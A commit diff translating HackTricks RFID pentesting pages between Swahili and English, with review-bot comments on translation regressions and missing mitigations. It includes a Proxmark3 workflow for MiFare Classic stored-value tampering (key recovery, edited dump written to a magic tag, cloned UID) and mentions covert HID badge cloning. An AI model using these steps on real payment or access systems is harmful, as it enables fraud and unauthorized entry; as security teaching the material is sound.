Translated ['src/todo/radio-hacking/proxmark-3.md', 'src/todo/radio-hack

Translator 2025-09-29 12:55:29 +00:00
parent 4e5e92f066
commit 18dcc99bde
2 changed files with 134 additions and 50 deletions

View File

@ -2,30 +2,30 @@
{{#include ../../banners/hacktricks-training.md}}
## Introduction
## Utangulizi
**Radio Frequency Identification (RFID)** ni suluhisho maarufu la redio la umbali mfupi. Kawaida hutumiwa kuhifadhi na kuhamasisha taarifa zinazotambulisha kitu.
**Utambuzi wa Mzunguko wa Redio (RFID)** ni suluhisho la redio la umbali mfupi lililo maarufu zaidi. Kwa kawaida hutumika kuhifadhi na kusambaza taarifa zinazomtambulisha kiumbe fulani.
Tag ya RFID inaweza kutegemea **chanzo chake cha nguvu (active)**, kama betri iliyojumuishwa, au kupokea nguvu yake kutoka kwa antenna ya kusoma kwa kutumia sasa **iliyopatikana kutoka kwa mawimbi ya redio yaliyopokelewa** (**passive**).
Tag ya RFID inaweza kutegemea **chanzo chake cha umeme (active)**, kama betri iliyojengewa ndani, au kupokea umeme wake kutoka kwenye antena ya kusoma kwa kutumia sasa **iliyootolewa kutokana na mawimbi ya redio yaliyopokelewa** (**passive**).
### Classes
### Madarasa
EPCglobal inagawanya tag za RFID katika makundi sita. Tag katika kila kundi ina uwezo wote ulioorodheshwa katika kundi la awali, na kuifanya iweze kufanya kazi na makundi ya zamani.
EPCglobal inagawanya tag za RFID katika makundi sita. Tag katika kila kundi ina uwezo wote uliotajwa katika kundi la awali, jambo linalofanya ziwe zenye ulinganifu wa nyuma.
- **Class 0** tags ni **passive** tags zinazofanya kazi katika **UHF** bendi. Mtoa huduma **anaziandaa** kabla ya uzalishaji. Kwa hivyo, huwezi **kubadilisha** taarifa zilizohifadhiwa katika kumbukumbu zao.
- **Class 1** tags pia zinaweza kufanya kazi katika **HF** bendi. Zaidi ya hayo, zinaweza **kuandikwa mara moja tu** baada ya uzalishaji. Tag nyingi za Class 1 zinaweza pia kushughulikia **cyclic redundancy checks** (CRCs) za amri wanazopokea. CRCs ni bytes chache za ziada mwishoni mwa amri kwa ajili ya kugundua makosa.
- **Class 2** tags zinaweza **kuandikwa mara nyingi**.
- **Class 3** tags zinaweza kuwa na **sensors zilizojumuishwa** ambazo zinaweza kurekodi vigezo vya mazingira, kama vile joto la sasa au mwendo wa tag. Tag hizi ni **semi-passive**, kwa sababu ingawa zina **chanzo cha nguvu** kilichojumuishwa, kama **betri** iliyounganishwa, hazina uwezo wa kuanzisha **mawasiliano** ya wireless na tag nyingine au wasomaji.
- **Class 4** tags zinaweza kuanzisha mawasiliano na tag nyingine za kundi hilo, na kuifanya kuwa **active tags**.
- **Class 5** tags zinaweza kutoa **nguvu kwa tag nyingine na kuwasiliana na makundi yote ya tag** yaliyotangulia. Tag za Class 5 zinaweza kutenda kama **RFID readers**.
- **Class 0** tags are **passive** tags that operate in **UHF** bands. The vendor **preprograms** them at the production factory. As a result, you **cant change** the information stored in their memory.
- **Class 1** tags can also operate in **HF** bands. In addition, they can be **written only once** after production. Many Class 1 tags can also process **cyclic redundancy checks** (CRCs) of the commands they receive. CRCs are a few extra bytes at the end of the commands for error detection.
- **Class 2** tags can be **written multiple times**.
- **Class 3** tags can contain **embedded sensors** that can record environmental parameters, such as the current temperature or the tags motion. These tags are **semi-passive**, because although they **have** an embedded power source, such as an integrated **battery**, they **cant initiate** wireless **communication** with other tags or readers.
- **Class 4** tags can initiate communication with other tags of the same class, making them **active tags**.
- **Class 5** tags can provide **power to other tags and communicate with all the previous tag** classes. Class 5 tags can act as **RFID readers**.
### Information Stored in RFID Tags
Kumbukumbu ya tag ya RFID kawaida huhifadhi aina nne za data: **data ya utambulisho**, ambayo **inatambulisha** **kitu** ambacho tag imeunganishwa (data hii inajumuisha maeneo yaliyowekwa na mtumiaji, kama akaunti za benki); **data ya nyongeza**, ambayo inatoa **maelezo zaidi** kuhusu kitu; **data ya udhibiti**, inayotumika kwa **mipangilio** ya ndani ya tag; na **data ya mtengenezaji** wa tag, ambayo ina Kitambulisho Maalum cha Tag (**UID**) na maelezo kuhusu **uzalishaji**, **aina**, na **mtoa huduma** wa tag. Utapata aina mbili za kwanza za data katika tag zote za kibiashara; mbili za mwisho zinaweza kutofautiana kulingana na mtoa huduma wa tag.
An RFID tags memory usually stores four kinds of data: the **identification data**, which **identifies** the **entity** to which the tag is attached (this data includes user-defined fields, such as bank accounts); the **supplementary data**, which provides **further** **details** regarding the entity; the **control data**, used for the tags internal **configuration**; and the tags **manufacturer data**, which contains a tags Unique Identifier (**UID**) and details regarding the tags **production**, **type**, and **vendor**. Youll find the first two kinds of data in all the commercial tags; the last two can differ based on the tags vendor.
Standards ya ISO inabainisha thamani ya Kitambulisho cha Familia ya Maombi (**AFI**), msimbo unaoashiria **aina ya kitu** ambacho tag inahusiana nacho. Usajili mwingine muhimu, pia ulioainishwa na ISO, ni Kitambulisho cha Muundo wa Hifadhi ya Data (**DSFID**), ambacho kinaelezea **mpangilio wa kimantiki wa data ya mtumiaji**.
The ISO standard specifies the Application Family Identifier (**AFI**) value, a code that indicates the **kind of object** the tag belongs to. Another important register, also specified by ISO, is the Data Storage Format Identifier(**DSFID**), which defines the **logical organization of the user data**.
Mifumo mingi ya **udhibiti wa usalama** wa RFID ina mekanizimu ambazo **zinapunguza** operesheni za **kusoma** au **kuandika** kwenye kila kizuizi cha kumbukumbu ya mtumiaji na kwenye usajili maalum unaoshikilia thamani za AFI na DSFID. Mekanizimu hizi **zinazifunga** hutumia data iliyohifadhiwa katika kumbukumbu ya udhibiti na zina **nywila za default** zilizowekwa awali na mtoa huduma lakini zinawaruhusu wamiliki wa tag **kuunda nywila za kawaida**.
Most RFID **security controls** have mechanisms that **restrict** the **read** or **write** operations on each user memory block and on the special registers containing the AFI and DSFID values. These **lock** **mechanisms** use data stored in the control memory and have **default passwords** preconfigured by the vendor but allow the tag owners to **configure custom passwords**.
### Low & High frequency tags comparison
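Review bot: the Classes bullets and the three paragraphs under "Information Stored in RFID Tags" replace Swahili with English (the hunk drops "- **Class 0** tags ni **passive** tags zinazofanya kazi katika **UHF** bendi." in favour of "- **Class 0** tags are **passive** tags that operate in **UHF** bands.", and does the same for the memory-layout, AFI/DSFID and lock-mechanism paragraphs), while the heading in the same hunk is translated to "## Utangulizi". Either keep the removed Swahili lines or retranslate the English ones, and translate the untouched context headings "### Information Stored in RFID Tags" and "### Low & High frequency tags comparison" so the section is in one language. If the English text stays, restore its lost apostrophes ("cant change", "the tags motion", "Youll find"). In the retranslated intro, "iliyootolewa" looks like a typo for "iliyotolewa".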
@ -33,21 +33,21 @@ Mifumo mingi ya **udhibiti wa usalama** wa RFID ina mekanizimu ambazo **zinapung
## Low-Frequency RFID Tags (125kHz)
**Low-frequency tags** mara nyingi hutumiwa katika mifumo ambayo **hayahitaji usalama wa juu**: ufikiaji wa majengo, funguo za intercom, kadi za uanachama wa gym, n.k. Kutokana na umbali wao mrefu, ni rahisi kutumia kwa maegesho ya magari ya kulipia: dereva hahitaji kuleta kadi karibu na msomaji, kwani inasababishwa kutoka mbali. Wakati huo huo, low-frequency tags ni za msingi sana, zina kiwango cha chini cha uhamasishaji wa data. Kwa sababu hiyo, haiwezekani kutekeleza uhamasishaji wa data wa pande mbili kwa mambo kama kuhifadhi salio na cryptography. Low-frequency tags hutuma tu kitambulisho chao kifupi bila njia yoyote ya uthibitishaji.
**Low-frequency tags** are often used in systems that **do not require high security**: building access, intercom keys, gym membership cards, etc. Due to their higher range, they are convenient to use for paid car parking: the driver does not need to bring the card close to the reader, as it is triggered from further away. At the same time, low-frequency tags are very primitive, they have a low data transfer rate. For that reason, it's impossible to implement complex two-way data transfer for such things as keeping balance and cryptography. Low-frequency tags only transmit their short ID without any means of authentication.
Vifaa hivi vinategemea teknolojia ya **passive** **RFID** na vinafanya kazi katika **kasi ya 30 kHz hadi 300 kHz**, ingawa ni kawaida kutumia 125 kHz hadi 134 kHz:
These devices rely on **passive** **RFID** technology and operate in a **range of 30 kHz to 300 kHz**, although it's more usual to use 125 kHz to 134 kHz:
- **Long Range**frequency ya chini inamaanisha umbali mrefu. Kuna wasomaji wa EM-Marin na HID, ambao hufanya kazi kutoka umbali wa hadi mita moja. Hizi mara nyingi hutumiwa katika maegesho ya magari.
- **Primitive protocol**kutokana na kiwango cha chini cha uhamasishaji wa data, tag hizi zinaweza tu kutuma kitambulisho chao kifupi. Katika hali nyingi, data haithibitishwa na haijalindwa kwa njia yoyote. Mara tu kadi inapokuwa katika umbali wa msomaji, inaanza kutuma kitambulisho chake.
- **Low security**Kadi hizi zinaweza kunakiliwa kwa urahisi, au hata kusomwa kutoka mfukoni mwa mtu mwingine kutokana na msingi wa itifaki.
- **Long Range**lower frequency translates to higher range. There are some EM-Marin and HID readers, which work from a distance of up to a meter. These are often used in car parking.
- **Primitive protocol**due to the low data transfer rate these tags can only transmit their short ID. In most cases, data is not authenticated and it's not protected in any way. As soon as the card is in the range of the reader it just starts transmitting its ID.
- **Low security**These cards can be easily copied, or even read from somebody else's pocket due to the protocol's primitiveness.
**Protocols maarufu za 125 kHz:**
**Popular 125 kHz protocols:**
- **EM-Marin** — EM4100, EM4102. Itifaki maarufu zaidi katika CIS. Inaweza kusomwa kutoka takriban mita moja kutokana na urahisi na uthabiti wake.
- **HID Prox II**itifaki ya frequency ya chini iliyoanzishwa na HID Global. Itifaki hii ni maarufu zaidi katika nchi za magharibi. Ni ngumu zaidi na kadi na wasomaji wa itifaki hii ni ghali zaidi.
- **Indala**itifaki ya zamani ya frequency ya chini ambayo ilianzishwa na Motorola, na baadaye kununuliwa na HID. Una uwezekano mdogo wa kuikuta katika mazingira ikilinganishwa na mbili zilizotangulia kwa sababu inatolewa nje ya matumizi.
- **EM-Marin** — EM4100, EM4102. The most popular protocol in CIS. Can be read from about a meter because of its simplicity and stability.
- **HID Prox II**low-frequency protocol introduced by HID Global. This protocol is more popular in the western countries. It is more complex and the cards and readers for this protocol are relatively expensive.
- **Indala**very old low-frequency protocol that was introduced by Motorola, and later acquired by HID. You are less likely to encounter it in the wild compared to the previous two because it is falling out of use.
Kwa kweli, kuna itifaki nyingi zaidi za frequency ya chini. Lakini zote zinatumia moduli sawa kwenye tabaka la kimwili na zinaweza kuzingatiwa, kwa njia moja au nyingine, kama toleo la zile zilizoorodheshwa hapo juu.
In reality, there are a lot more low-frequency protocols. But they all use the same modulation on the physical layer and may be considered, in one way or another, a variation of those listed above.
### Attack
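Review bot: every change in this hunk swaps a Swahili paragraph or bullet for its English original (for example "**Low-frequency tags** mara nyingi hutumiwa katika mifumo ambayo **hayahitaji usalama wa juu**" becomes "**Low-frequency tags** are often used in systems that **do not require high security**"), which undoes the translation of the whole 125 kHz section; keep the Swahili side unless the intent really is to revert. On both sides the bullet labels have lost the separator after the bold text ("**Long Range**lower frequency translates to higher range", "**Primitive protocol**due to the low data transfer rate"), while the EM-Marin entry still has its dash; add the separator back so the labels do not run into the sentence.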
@ -60,24 +60,24 @@ flipper-zero/fz-125khz-rfid.md
## High-Frequency RFID Tags (13.56 MHz)
**High-frequency tags** hutumiwa kwa mwingiliano wa tag-msomaji wenye ugumu zaidi unapohitaji cryptography, uhamasishaji mkubwa wa data wa pande mbili, uthibitishaji, n.k.\
Kawaida hupatikana katika kadi za benki, usafiri wa umma, na pasi nyingine za usalama.
**High-frequency tags** are used for a more complex reader-tag interaction when you need cryptography, a large two-way data transfer, authentication, etc.\
It's usually found in bank cards, public transport, and other secure passes.
**High-frequency 13.56 MHz tags ni seti ya viwango na itifaki**. Kawaida hujulikana kama [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), lakini hiyo si sahihi kila wakati. Seti ya msingi ya itifaki inayotumika kwenye ngazi za kimwili na kimantiki ni ISO 14443. Itifaki za kiwango cha juu, pamoja na viwango mbadala (kama ISO 19092), zinategemea hiyo. Watu wengi hujulikana na teknolojia hii kama **Near Field Communication (NFC)**, neno linalotumika kwa vifaa vinavyofanya kazi kwenye frequency ya 13.56 MHz.
**High-frequency 13.56 MHz tags are a set of standards and protocols**. They are usually referred to as [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/), but that's not always correct. The basic protocol set used on the physical and logical levels is ISO 14443. High-level protocols, as well as alternative standards (like ISO 19092), are based upon it. Many people refer to this technology as **Near Field Communication (NFC)**, a term for devices operating over the 13.56 MHz frequency.
<figure><img src="../../images/image (930).png" alt=""><figcaption></figcaption></figure>
Kwa ufupi, usanifu wa NFC unafanya kazi kama ifuatavyo: itifaki ya uhamasishaji inachaguliwa na kampuni inayotengeneza kadi na kutekelezwa kulingana na kiwango cha chini cha ISO 14443. Kwa mfano, NXP iligundua itifaki yake ya uhamasishaji wa kiwango cha juu inayoitwa Mifare. Lakini kwenye kiwango cha chini, kadi za Mifare zinategemea kiwango cha ISO 14443-A.
To put it simply, NFC's architecture works like this: the transmission protocol is chosen by the company making the cards and implemented based on the low-level ISO 14443. For example, NXP invented its own high-level transmission protocol called Mifare. But on the lower level, Mifare cards are based on ISO 14443-A standard.
Flipper inaweza kuingiliana na itifaki ya kiwango cha chini ya ISO 14443, pamoja na itifaki ya uhamasishaji wa data ya Mifare Ultralight na EMV inayotumika katika kadi za benki. Tunafanya kazi kuongeza msaada kwa Mifare Classic na NFC NDEF. Kuangalia kwa kina itifaki na viwango vinavyounda NFC ni vyema kuwa na makala tofauti ambayo tunapanga kuwa nayo baadaye.
Flipper can interact with both the low-level ISO 14443 protocol, as well as Mifare Ultralight data transfer protocol and EMV used in bank cards. We're working on adding support for Mifare Classic and NFC NDEF. A thorough look at the protocols and standards that make up NFC is worth a separate article which we plan to have up later.
Kadi zote za frequency ya juu zinazotegemea kiwango cha ISO 14443-A zina Kitambulisho cha kipekee cha chip. Inafanya kazi kama nambari ya serial ya kadi, kama anwani ya MAC ya kadi ya mtandao. **Kawaida, UID ni urefu wa byte 4 au 7**, lakini inaweza nadra kufikia **hadi 10**. UIDs si siri na zinaweza kusomwa kwa urahisi, **wakati mwingine hata zimeandikwa kwenye kadi yenyewe**.
All high-frequency cards based on ISO 14443-A standard have a unique chip ID. It acts as the card's serial number, like a network card's MAC address. **Usually, the UID is 4 or 7 bytes long**, but can rarely go **up to 10**. UIDs are not a secret and they are easily readable, **sometimes even printed on the card itself**.
Kuna mifumo mingi ya udhibiti wa ufikiaji inayotegemea UID ili **kuhakiki na kutoa ufikiaji**. Wakati mwingine hii inatokea **hata** wakati tag za RFID **zinasaidia cryptography**. **Matumizi mabaya** kama haya yanazifanya kuwa sawa na kadi za **125 kHz** zisizo na akili kwa upande wa **usalama**. Kadi za virtual (kama Apple Pay) hutumia UID ya dinamik ili wamiliki wa simu wasifungue milango kwa kutumia programu yao ya malipo.
There are many access control systems that rely on UID to **authenticate and grant access**. Sometimes this happens **even** when RFID tags **support cryptography**. Such **misuse** brings them down to the level of the dumb **125 kHz cards** in terms of **security**. Virtual cards (like Apple Pay) use a dynamic UID so that phone owners won't go opening doors with their payment app.
- **Low range**kadi za frequency ya juu zimeundwa mahsusi ili ziweze kuwekwa karibu na msomaji. Hii pia husaidia kulinda kadi kutokana na mwingiliano usioidhinishwa. Umbali wa juu zaidi wa kusoma ambao tumefanikiwa kufikia ulikuwa takriban sentimita 15, na hiyo ilikuwa na wasomaji wa umbali mrefu waliotengenezwa kwa kawaida.
- **Advanced protocols**kasi za uhamasishaji wa data hadi 424 kbps zinaruhusu itifaki ngumu zenye uhamasishaji wa data wa pande mbili. Ambayo kwa upande mwingine **inaruhusu cryptography**, uhamasishaji wa data, n.k.
- **High security**kadi za frequency ya juu zisizo na mawasiliano hazina kasoro ikilinganishwa na kadi za smart. Kuna kadi zinazosaidia algorithms zenye nguvu za cryptography kama AES na kutekeleza cryptography isiyo ya kawaida.
- **Low range**high-frequency cards are specifically designed so that they would have to be placed close to the reader. This also helps to protect the card from unauthorized interactions. The maximum read range that we managed to achieve was about 15 cm, and that was with custom-made high-range readers.
- **Advanced protocols**data transfer speeds up to 424 kbps allow complex protocols with full-fledged two-way data transfer. Which in turn **allows cryptography**, data transfer, etc.
- **High security**high-frequency contactless cards are in no way inferior to smart cards. There are cards that support cryptographically strong algorithms like AES and implement asymmetrical cryptography.
### Attack
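Review bot: same regression as the earlier hunks: the 13.56 MHz section goes from Swahili back to English ("**High-frequency tags** hutumiwa kwa mwingiliano wa tag-msomaji wenye ugumu zaidi" is replaced by "**High-frequency tags** are used for a more complex reader-tag interaction"), so the file ends up mixed-language. Separately, the added lines keep first-person wording lifted from the Flipper Zero blog post listed in the references ("We're working on adding support for Mifare Classic and NFC NDEF", "The maximum read range that we managed to achieve was about 15 cm"), which reads as if the HackTricks authors are speaking; attribute it to the Flipper post or rephrase in third person. Whichever language is kept, preserve the security point that UID-only access control reduces a card with cryptographic support to the level of a 125 kHz tag.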
@ -88,16 +88,62 @@ You can **attack these Tags with the Flipper Zero**:
flipper-zero/fz-nfc.md
{{#endref}}
Au kwa kutumia **proxmark**:
Or using the **proxmark**:
{{#ref}}
proxmark-3.md
{{#endref}}
### Building a Portable HID MaxiProx 125 kHz Mobile Cloner
### MiFare Classic offline stored-value tampering (broken Crypto1)
Ikiwa unahitaji suluhisho la **umbali mrefu**, **linalotumia betri** kwa ajili ya kukusanya vitambulisho vya HID Prox® wakati wa shughuli za red-team, unaweza kubadilisha msomaji wa **HID MaxiProx 5375** uliowekwa ukutani kuwa cloner huru inayofaa kwenye begi la nyuma. Maelezo kamili ya kiufundi na umeme yanapatikana hapa:
When a system stores a monetary balance directly on a MiFare Classic card, you can often manipulate it because Classic uses NXPs deprecated Crypto1 cipher. Crypto1 has been broken for years, allowing recovery of sector keys and full read/write of card memory with commodity hardware (e.g., Proxmark3).
End-to-end workflow (abstracted):
1) Dump the original card and recover keys
```bash
# Attempt all built-in Classic key recovery attacks and dump the card
hf mf autopwn
```
Hii kwa kawaida hurudisha funguo za sekta (A/B) na kutengeneza dump kamili ya kadi katika folda ya client dumps.
2) Pata na uelewe value/integrity fields
- Fanya top-ups halali kwenye kadi ya asili na chukua dumps nyingi (kabla/baada).
- Fanya diff ya dumps mbili ili kubaini blocks/bytes zinazobadilika ambazo zinaonyesha balance na value/integrity fields yoyote.
- Deployments nyingi za Classic hutumia au "value block" encoding ya asili au hufanya checksums zao wenyewe (mfano, XOR ya balance na field nyingine na constant). Baada ya kubadilisha balance, hesabu upya integrity bytes ipasavyo na uhakikishe mashamba yote yaliyorudiwa/yanayokamilishwa yameendana.
3) Andika dump iliyobadilishwa kwenye writable “Chinese magic” Classic tag
```bash
# Load a modified binary dump onto a UID-changeable Classic tag
hf mf cload -f modified.bin
```
4) Clone UID asili ili terminals zitambue kadi
```bash
# Set the UID on a UID-changeable tag (gen1a/gen2 magic)
hf mf csetuid -u <original_uid>
```
5) Kutumia kwenye terminals
Vinasomaji vinavyomuamini salio kwenye kadi na UID vitakubali kadi iliyodanganywa. Uchunguzi wa uwanjani unaonyesha kuwa utekelezaji mwingi huweka kikomo salio kulingana na upana wa uwanja (kwa mfano, 16-bit fixed-point).
Notes
- Ikiwa mfumo unatumia native Classic value blocks, kumbuka muundo: value (4B) + ~value (4B) + value (4B) + block address + ~address. All parts must match.
- Kwa miundo maalum yenye checksums rahisi, differential analysis ni njia ya haraka zaidi ya kupata integrity function bila ku-reverse firmware.
- Tu UID-changeable tags ("Chinese magic" gen1a/gen2) zinaruhusu kuandika block 0/UID. Normal Classic cards have read-only UIDs.
Kwa amri za Proxmark3 za vitendo, tazama:
{{#ref}}
proxmark-3.md
{{#endref}}
### Kujenga Mobile Cloner wa Kubebeka wa HID MaxiProx 125 kHz
Ikiwa unahitaji suluhisho la **ya umbali mrefu**, **inayotumia betri** kwa kuvuna badges za HID Prox® wakati wa shughuli za red-team, unaweza kubadilisha reader ya ukutani **HID MaxiProx 5375** kuwa cloner huru inayofaa katika mkoba. Mwongozo wa kina wa mitambo na umeme upatikana hapa:
{{#ref}}
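Review bot: the new "MiFare Classic offline stored-value tampering" section gives no defensive guidance, even though the proxmark-3.md change in this same commit points here for "hatua za kuzuia" and the added references (the NXP Crypto1 statement and the SEC Consult KioSoft advisory) are about exactly that; add a short mitigation paragraph: keep the balance and transaction history server-side and treat the card only as a token, never accept the UID or on-card fields as proof of value, and migrate deployments off Crypto1-based Classic. Two accuracy points in the Notes list: the value-block layout in "Ikiwa mfumo unatumia native Classic value blocks, kumbuka muundo: value (4B) + ~value (4B) + value (4B) + block address + ~address" is incomplete, since the address byte is stored twice with its complement (addr, ~addr, addr, ~addr) to fill the 16-byte block; and the section is half English and half Swahili (the heading, the intro paragraph and "End-to-end workflow (abstracted):" are English, everything from "Hii kwa kawaida hurudisha funguo za sekta" onward is Swahili), so pick one language. The MaxiProx cloner section is only moved below the new section, which is fine.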
@ -106,9 +152,12 @@ maxiprox-mobile-cloner.md
---
## References
## Marejeo
- [https://blog.flipperzero.one/rfid/](https://blog.flipperzero.one/rfid/)
- [Let's Clone a Cloner Part 3 (TrustedSec)](https://trustedsec.com/blog/lets-clone-a-cloner-part-3-putting-it-all-together)
- [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
- [MIFARE security overview (Wikipedia)](https://en.wikipedia.org/wiki/MIFARE#Security)
- [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
{{#include ../../banners/hacktricks-training.md}}
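Review bot: only the References heading is translated here ("## References" becomes "## Marejeo"), while the section headings shown as context elsewhere in this file ("### Information Stored in RFID Tags", "## Low-Frequency RFID Tags (125kHz)", "### Attack") stay English; translate them in the same commit or leave this one alone so heading language is uniform. The three added references are the right sources for the new Classic section, but the "Uchunguzi wa uwanjani" sentence about 16-bit balance limits has no inline source; if it comes from the SEC Consult advisory, link it next to that sentence rather than only in this list.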

View File

@ -2,17 +2,17 @@
{{#include ../../banners/hacktricks-training.md}}
## Kushambulia Mifumo ya RFID kwa Proxmark3
## Kushambulia Mfumo za RFID kwa Proxmark3
Jambo la kwanza unahitaji kufanya ni kuwa na [**Proxmark3**](https://proxmark.com) na [**kufunga programu na utegemezi wake**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
Kitu cha kwanza unachohitaji kufanya ni kuwa na [**Proxmark3**](https://proxmark.com) na [**install the software and it's dependencie**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).
### Kushambulia MIFARE Classic 1KB
Ina **sehemu 16**, kila moja ina **blocks 4** na kila block ina **16B**. UID iko katika sehemu 0 block 0 (na haiwezi kubadilishwa).\
Ili kufikia kila sehemu unahitaji **funguo 2** (**A** na **B**) ambazo zimehifadhiwa katika **block 3 ya kila sehemu** (sehemu trailer). Sehemu trailer pia inahifadhi **vifungo vya ufikiaji** vinavyotoa **ruhusa za kusoma na kuandika** kwenye **kila block** kwa kutumia funguo 2.\
Funguo 2 ni muhimu kutoa ruhusa za kusoma ikiwa unajua ya kwanza na kuandika ikiwa unajua ya pili (kwa mfano).
Ina **16 sectors**, kila moja yao ina **4 blocks** na kila block ina **16B**. UID iko katika sector 0 block 0 (na haiwezi kubadilishwa).\
Ili kufikia kila sector unahitaji **2 keys** (**A** na **B**) ambazo zimetunzwa katika **block 3 of each sector** (sector trailer). Sector trailer pia inahifadhi **access bits** zinazotoa ruhusa za **read and write** kwenye **each block** zikitumia 2 keys.\
2 keys zinafaa kutoa ruhusa za kusoma ikiwa unajua key ya kwanza, na ruhusa za kuandika ikiwa unajua key ya pili (kwa mfano).
Mashambulizi kadhaa yanaweza kufanywa
Shambulizi kadhaa zinaweza kufanywa
```bash
proxmark3> hf mf #List attacks
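Review bot: the retranslated heading "## Kushambulia Mfumo za RFID kwa Proxmark3" is ungrammatical (the plural of mfumo is mifumo and takes ya), so the removed "## Kushambulia Mifumo ya RFID kwa Proxmark3" was the correct one; likewise "Shambulizi kadhaa zinaweza kufanywa" has wrong agreement and the removed "Mashambulizi kadhaa yanaweza kufanywa" should stay. The new intro line also leaves the link text untranslated and keeps an old defect, "[**install the software and it's dependencie**]...[**s**]": "it's" should be "its", and the word should not be split across two links to the same wiki page. The MIFARE Classic 1K paragraph is now a Swahili/English mix ("Ina **16 sectors**, kila moja yao ina **4 blocks**") where the removed version was fully Swahili; prefer the removed wording.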
@ -31,11 +31,39 @@ proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```
Proxmark3 inaruhusu kufanya vitendo vingine kama **kusikiliza** mawasiliano ya **Tag na Reader** ili kujaribu kupata data nyeti. Katika kadi hii unaweza tu kusikiliza mawasiliano na kuhesabu funguo zilizotumika kwa sababu **operesheni za kijasusi zilizotumika ni dhaifu** na kujua maandiko ya wazi na maandiko ya cipher unaweza kuhesabu (`mfkey64` tool).
The Proxmark3 inaruhusu kufanya vitendo vingine kama **eavesdropping** ya **Tag to Reader communication** ili kujaribu kupata data nyeti. Katika kadi hii unaweza tu sniff mawasiliano na kuhesabu ufunguo uliotumika kwa sababu **cryptographic operations used are weak** na ukijua plain and cipher text unaweza kuuhesabu (`mfkey64` tool).
#### MiFare Classic mtiririko mfupi wa kazi kwa utumiaji mbaya wa thamani iliyohifadhiwa
Wakati terminals zinapohifadhi salio kwenye kadi za Classic, mtiririko wa kawaida kutoka mwanzo hadi mwisho ni:
```bash
# 1) Recover sector keys and dump full card
proxmark3> hf mf autopwn
# 2) Modify dump offline (adjust balance + integrity bytes)
# Use diffing of before/after top-up dumps to locate fields
# 3) Write modified dump to a UID-changeable ("Chinese magic") tag
proxmark3> hf mf cload -f modified.bin
# 4) Clone original UID so readers recognize the card
proxmark3> hf mf csetuid -u <original_uid>
```
Vidokezo
- `hf mf autopwn` inasimamia nested/darkside/HardNested-style attacks, inapata keys, na huunda dumps katika client dumps folder.
- Kuandika block 0/UID kunaweza kufanya kazi tu kwenye magic gen1a/gen2 cards. Kadi za Classic za kawaida zina UID ya read-only.
- Mipangilio mingi hutumia Classic "value blocks" au simple checksums. Hakikisha kuwa all duplicated/complemented fields na checksums zinabaki zikiwa sawia baada ya uhariri.
Tazama mbinu ya kiwango cha juu na hatua za kuzuia katika:
{{#ref}}
pentesting-rfid.md
{{#endref}}
### Amri Mbichi
Mifumo ya IoT wakati mwingine hutumia **vitambulisho visivyo na chapa au visivyo vya kibiashara**. Katika kesi hii, unaweza kutumia Proxmark3 kutuma **amri mbichi za kawaida kwa vitambulisho**.
Sistimu za IoT wakati mwingine hutumia **tags zisizo za chapa au zisizo za kibiashara**. Katika kesi hii, unaweza kutumia Proxmark3 kutuma **amri mbichi maalum kwa tags**.
```bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
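Review bot: the new "MiFare Classic mtiririko mfupi wa kazi" block repeats, almost line for line, the workflow added to pentesting-rfid.md in this same commit (autopwn, offline dump edit, cload, csetuid), so the two copies will drift; keep the commands in one file and cross-reference from the other. The closing pointer "Tazama mbinu ya kiwango cha juu na hatua za kuzuia katika:" promises prevention measures in pentesting-rfid.md, but the section added there contains none; either add them (server-side balances, no trust in UID or on-card value fields, migration off Crypto1) or drop "hatua za kuzuia" from the sentence. The replaced eavesdropping paragraph also regresses to a language mix ("The Proxmark3 inaruhusu kufanya vitendo vingine kama **eavesdropping** ya **Tag to Reader communication**") where the removed line was fully Swahili.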
@ -45,14 +73,21 @@ No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```
Kwa habari hii unaweza kujaribu kutafuta taarifa kuhusu kadi na kuhusu njia ya kuwasiliana nayo. Proxmark3 inaruhusu kutuma amri za moja kwa moja kama: `hf 14a raw -p -b 7 26`
Kwa taarifa hizi unaweza kujaribu kutafuta taarifa kuhusu kadi na kuhusu jinsi ya kuwasiliana nayo. Proxmark3 inaruhusu kutuma amri ghafi kama: `hf 14a raw -p -b 7 26`
### Scripts
### Skripti
Programu ya Proxmark3 inakuja na orodha ya **scripts za automatisering** zilizopakiwa awali ambazo unaweza kutumia kufanya kazi rahisi. Ili kupata orodha kamili, tumia amri ya `script list`. Kisha, tumia amri ya `script run`, ikifuatiwa na jina la script:
Programu ya Proxmark3 inakuja na orodha iliyopakiwa mapema ya **skripti za otomatiki** ambazo unaweza kutumia kutekeleza kazi rahisi. Ili kupata orodha kamili, tumia amri `script list`. Kisha, tumia amri `script run`, ikifuatiwa na jina la skripti:
```
proxmark3> script run mfkeys
```
Unaweza kuunda skripti ya **fuzz tag readers**, hivyo kunakili data ya **kadi halali** andika **Lua script** ambayo **randomize** moja au zaidi **bytes** za nasibu na uangalie kama **reader inashindwa** na iteration yoyote.
Unaweza kuunda script ya **fuzz tag readers**; kwa kunakili data ya **valid card**, andika tu **Lua script** inayofanya **randomize** kwa mmoja au zaidi wa **bytes** za nasibu, kisha angalia ikiwa **reader crashes** kwa mzunguko wowote.
## Marejeo
- [Proxmark3 wiki: HF MIFARE](https://github.com/RfidResearchGroup/proxmark3/wiki/HF-Mifare)
- [Proxmark3 wiki: HF Magic cards](https://github.com/RfidResearchGroup/proxmark3/wiki/HF-Magic-cards)
- [NXP statement on MIFARE Classic Crypto1](https://www.mifare.net/en/products/chip-card-ics/mifare-classic/security-statement-on-crypto1-implementations/)
